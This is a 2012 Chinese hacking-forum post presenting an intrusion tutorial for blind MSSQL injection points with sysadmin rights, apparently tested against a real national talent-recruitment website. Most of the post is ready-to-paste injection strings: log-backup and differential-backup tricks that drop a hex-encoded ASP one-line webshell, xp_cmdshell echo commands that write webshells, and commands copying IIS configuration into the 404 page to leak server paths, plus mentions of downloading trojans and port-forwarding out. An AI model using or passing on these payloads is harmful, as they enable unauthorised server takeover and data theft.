找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2257|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
# l+ ]0 t# P- Z6 ?1 ^! M) Y2 m9 \; L* n" x0 u& M
$ F) Y& v( k- F- D; t
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
2 C2 X( O- V* g: u) p
" k# U. \; q7 {/ j                                                                 
; O% H* A3 ^& @( m. a* B% W                                                                 ; A8 y$ v7 x* K9 h& H# C% K
                                                                  论坛: http://www.90team.net/5 O" F' o; k3 t" h! x

- b& {7 ?; ?' r) ]& s* s  ^2 P% z$ N1 f
: ~( @4 P; `( G
友情检测国家人才网; A" O& x$ ~" @; ~* `; b4 K% N
) w9 Z1 B8 M/ D' ]! r
! \. q+ @0 P+ z/ U# z" s
内容:MSSQL注入SA权限不显错模式下的入侵
2 M& g5 B& R! v' S2 O- A+ t0 g. i% n' e; p3 I

7 u( @- I7 F5 T6 `一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
2 r$ r& L. m" g" I5 o# Y4 W5 a' n! Z, M1 ^9 H
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。3 f5 d, w. c+ l" O& u& d9 U7 f
' q) H4 @/ {" [$ G* k2 ?

* q5 m1 w8 S1 y1 |# x1 I这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
7 F. S9 ?7 o0 B, I6 f- ]4 }/ e8 W3 x: `5 c
思路:
8 I% k) u& N8 {3 |5 b- k% y  O: Z$ K
首先:& o6 j3 G* k, b( `" P
: |( a! [3 K3 H9 A6 ~7 {  R( u
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
2 I( d6 P# L3 R$ n, _" j& w. b5 O5 W, p8 |8 u
1.日志备份获得Webshell2 t* y0 @5 S' p  q+ y
: J0 C( m9 ^1 S' W! {/ }3 h, z
2.数据库差异备份获得Webshell
' b( [( a( X. W+ V7 j$ F. |! `% p8 s& n
4.直接下载免杀远控木马。
0 _% K$ L/ Z4 \$ c* Z5 V5 Y# B6 E7 O$ V  D
5.直接下载LCX将服务器端口转发出来
5 J; `! s9 }+ p$ l, ?' a* _/ A8 w* F# f7 I/ V
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。( `( C3 J# _& @$ A: W* ?$ G
  z2 [8 ~8 \& |) b8 v
7 F7 M" q6 x9 g7 f8 l: B2 E
$ T" u& P  u( j0 [
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
/ S3 E- R' Q& C# d. a6 l6 ^' j3 Q
# @# l6 @1 i; L+ @9 ~我直接演示后面一个方法
% x. X& q( V! o% _+ u; ]# b% `7 ~3 y9 l
8 J0 l' n6 y7 t
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
2 k5 b  A8 w% z7 H7 n4 A1 n+ I7 D6 u- W. p
3 F$ @0 S. d2 j2 v. J
1 q: F- i  b9 g0 v
1 I0 _: i& G: I2 }4 o  z$ L
◆日志备份:4 _% n" c! j4 ]5 i) H: v

2 V7 v/ w& f  f% @
( M  v4 W6 M3 m, L  d1. 进行初始备份
4 k+ |! Z" Q0 o( S) ], f* {; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--! f4 j6 g  G' r3 }. [( @! i3 `5 \; k
0 z8 m/ `+ I# o$ r+ H
2. 插入数据8 ~/ y4 d! R+ y+ g: ]
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--8 f& g6 Z" x" Q# i% f  P* z
8 q5 b3 W0 |' g* k
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
* U1 g4 H! }) I( ~  
' _( F* U1 C0 D  V) y0 |2 X" L3. 备份并获得文件,删除临时表
0 k5 s0 L; v7 i$ o' B; C;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--$ @4 {" q0 }! o* s6 z
6 z5 \# a: F5 l) t! a% N

% x. l- y, b$ z$ ^% j7 F' B& p% }4 V6 [- s- j: M
◆数据库差异备份
$ l. t% c  l- m3 P/ Y. B3 r! w$ N" d7 g" e0 I4 i. W
(1. 进行差异备份准备工作  [& {% y% q$ |

" w" E$ E# l$ D6 B5 P;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--( q: M9 J2 P& @+ w& Y
# P$ f, d4 O) a7 @: N
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
! z0 ]; `$ k8 b
$ ?$ U: B7 Y" M  p- X* @: y9 F) x" e) ~
(2. 将数据写入到数据库% Y- I8 A9 z% ?- s! M5 N! f5 o
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
6 }# ?# W, q$ u3 Y1 V7 G; _5 S
( T" S1 m' e4 p1 n  R0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>7 E$ T1 N. y2 I  `$ j4 E
( U4 C7 W( ?* n; |) s
3. 备份数据库并清理临时文件
4 T% c) d, L. Q+ u2 N* @
/ ~# `$ r% ?, A# C6 g;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
# a/ N; d( r8 j9 j
5 e, P% U; _8 a1 A0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
2 w- f8 ^5 C* D# o% _- g- @) ^
5 z. x, D8 r5 j' \6 E8 G8 g" R3 |" G* p' p

9 @7 }0 e2 a- C6 M- }+ w用^转义字符来写ASP(一句话木马)文件的方法:   8 X9 N0 M8 m& U0 [9 f

7 M, K: _! m- F. n5 w$ [( Z1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
8 o2 J& n, z2 B/ T5 ^/ {
; _$ D( y, j8 `- j, e2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 2 a2 I" b8 o4 P2 g3 G$ A
5 a4 o9 l1 u; h. I" ~
读取IIS配置信息获取web路径
) v& a0 n: F5 w+ M$ D2 i
% Y# F3 k6 _4 d" l- Z     
) U8 J0 [7 S2 z# A0 K# `* ~     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
6 j9 k# D- p$ P5 c# i; ]' d% C1 N$ J- u7 B) a
执行命令! I. Q$ ?2 ~- Q
     " C* J/ I# U& G' [( v/ _
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--- k9 }0 l' E1 ?$ T

* b( P6 _/ y1 n0 w) p6 g- P
1 S6 z* ?$ q" D9 C8 {% ]( o, c$ L' P% y
/ t, X* [7 x% T( [: o1 C4 |2 p: J9 d0 k

0 m( Q, y; i9 a6 f$ \
4 i/ E  A" t5 \6 I
* y5 T, F; @$ ]+ E5 u0 V5 k6 ~1 E! r- C0 S  Y1 H2 R
2 R% M+ [7 N4 w' \% x
; H% I/ b, e. Q& b
+ w* R2 a% `4 X5 d$ `! {8 N

! n" S! ~1 E. `. e2 g1 A5 n- d- t" ]5 c+ y9 V3 u; h" ~! p

; e) g5 Y# C6 E/ F. _  ]" i% c. h3 \1 X; M2 I( U9 P

4 ]: \$ t+ h  Q" ~
& d' S& ]% N- u) C( W/ Y) x% n7 S" ^2 b, @* G
  H* K: T  y4 B
, @. @; C+ Y4 _1 o
4 S8 Q  n9 g6 K/ S7 D8 q- t

, N$ w4 P. m6 v& j& A" l+ U8 q' E* [( f' ?2 |: n$ A  q
; G& b8 Z8 L) c1 e
( S  c8 A6 r& V1 l

1 c* {, w; |( y" X  G# ?# S4 g0 v: \/ ^; J2 }# h

4 r0 ^4 i' O9 h- h1 i$ y& H! C: [8 Y. y  Y
+ h! o; s- e+ J1 M' O6 f% M

9 f( G* R1 J' I' l  \3 F( X3 t( `! b& T
# m# n" x7 d5 X- y4 L
/ n) n) T" j( N8 Y

6 J$ O: d" a$ A
) t1 o5 t; R9 p  K, A1 m
1 o4 N. Z) R7 }+ z5 P$ o2 @' [7 c) ~8 Y$ I

& P% a' [4 U# K
7 @* f- A, w( L7 z' @! ^
- w) L8 j3 @/ A/ o; z! C" }4 n! T3 m9 M9 R3 Z4 I
0 f6 M4 l0 E- E  W4 d' P& {/ D) z

$ ~1 m2 C7 G( b# }
1 d9 ?6 i! Z6 E8 P
7 \7 _- v+ H! l: q# z+ A3 m
; w( G! O' W; y1 O/ A; J
7 ~. z) c: ?. ?9 R( }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表